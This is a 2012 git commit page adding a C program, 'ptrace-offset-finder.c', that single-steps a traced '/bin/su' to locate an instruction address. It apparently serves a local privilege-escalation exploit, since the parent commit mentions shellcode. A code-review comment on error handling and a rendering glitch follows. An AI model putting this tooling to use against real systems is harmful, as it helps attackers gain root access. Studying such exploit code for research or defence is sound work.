author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 06:24:30 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 06:24:30 +0100 |
commit | c95b8b8f04572fb3409530982451e7a5fd122673 (patch) | |
tree | d268e53398b5554b5400a4f61bc059dd1f53e782 /ptrace-offset-finder.c | |
parent | Fix shellcode for dirty rsi. (diff) | |
Add initial version of ptrace finder for x64.
Diffstat (limited to 'ptrace-offset-finder.c')
-rw-r--r-- | ptrace-offset-finder.c | 46 |
1 files changed, 46 insertions, 0 deletions
diff --git a/ptrace-offset-finder.c b/ptrace-offset-finder.c
new file mode 100644
index 0000000..34e5682
--- /dev/null
+++ b/ptrace-offset-finder.c
@@ -0,0 +1,46 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/user.h>
+#include <sys/ptrace.h>
+#include <sys/reg.h>
+#include <asm/unistd_64.h>
+
+int main(int argc, char *argv[])
+{
+ int fd[2];
+ pipe2(fd, O_NONBLOCK);
+ int child = fork();
+ if (child) {
+ close(fd[1]);
+ char buf;
+ for (;;) {
+ wait(NULL);
+ if (read(fd[0], &buf, 1) > 0)
+ break;
+ ptrace(PTRACE_SYSCALL, child, NULL, NULL);
+ }
+
+ struct user_regs_struct regs;
+ for (;;) {
+ ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
+ wait(NULL);
+ ptrace(PTRACE_GETREGS, child, NULL, ®s);
+ if (regs.rip < 0x700000000000) {
+ printf("0x%lx\n", regs.rip);
+ break;
+ }
+ }
+ } else {
+ ptrace(PTRACE_TRACEME, 0, NULL, NULL);
+ close(fd[0]);
+ dup2(fd[1], 2);
+ execl("/bin/su", "su", "not-a-valid-user", NULL);
+ }
+ return 0;
+}
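Review bot: The `fork()` result is only tested for non-zero, so a failed fork (-1) takes the parent branch with `child == -1` and the first `for (;;)` never terminates, because once the parent has closed `fd[1]` and no child holds the write end, `read(fd[0], &buf, 1)` returns 0 at EOF rather than a positive count; add `if (child < 0) { perror("fork"); return 1; }` before the branch. The same pattern applies to `pipe2`, `wait` and every `ptrace` call in `main`, whose return values are ignored, so a tracee that exits early (for instance when `execl` fails) leaves both loops spinning instead of reporting an error, and in the second loop a failed `PTRACE_GETREGS` leaves `regs` uninitialized before `regs.rip` is read. On x86-64 `rip` in `struct user_regs_struct` is `unsigned long long`, so the specifier in `printf("0x%lx\n", regs.rip)` should be `%llx`. The `®s` on the `PTRACE_GETREGS` line appears to be the page's HTML-entity rendering of `&regs`, not a change in the committed source.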